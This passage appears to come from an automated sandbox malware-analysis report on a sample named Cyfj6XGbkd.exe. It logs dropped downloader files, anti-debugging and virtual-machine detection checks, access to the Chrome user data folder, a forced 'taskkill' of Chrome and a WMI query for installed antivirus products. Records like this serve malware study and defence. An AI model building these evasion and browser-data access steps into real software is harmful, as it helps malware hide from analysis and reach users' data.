Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_00403E2C rdtsc

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_100204C0

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe TID: 6764	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 7152	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 7164	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1001A170 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\

Source: 56BB1610C0318054.exe, 00000002.00000003.277122800.0000000003154000.00000004.00000001.sdmp	Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000002.00000003.249619357.0000000002DE1000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.251729735.0000000002C41000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000003.276888845.0000000003126000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000002.00000003.274009815.000000000310D000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP)
Source: ecvD64F.tmp.8.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150353Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=a3f17ad884a74d7f9591079e57f1f35d&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663704&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663704&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 56BB1610C0318054.exe, 00000002.00000003.273800958.0000000003104000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.251729735.0000000002C41000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 56BB1610C0318054.exe, 00000002.00000003.249685348.0000000002E0D000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.252026845.0000000002C6D000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000003.274009815.000000000310D000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 56BB1610C0318054.exe, 00000004.00000002.260847754.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware Virtual disk 2.0
Source: 56BB1610C0318054.exe, 00000002.00000003.277295939.00000000030E1000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterHB
Source: 56BB1610C0318054.exe, 00000002.00000003.274286153.0000000003113000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}k
Source: 56BB1610C0318054.exe, 00000002.00000003.273776372.0000000003107000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000004.00000002.260847754.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counterh

Source: C:\Users\user\AppData\Roaming\1611971443428.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process queried: DebugFlags

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_00403E2C rdtsc

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 1_2_079BEA04 LdrInitializeThunk,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_1001A010 IsDebuggerPresent,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_1000E90E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F41C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F4461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F4373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F4631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_1001779F cpuid

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_10015254 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
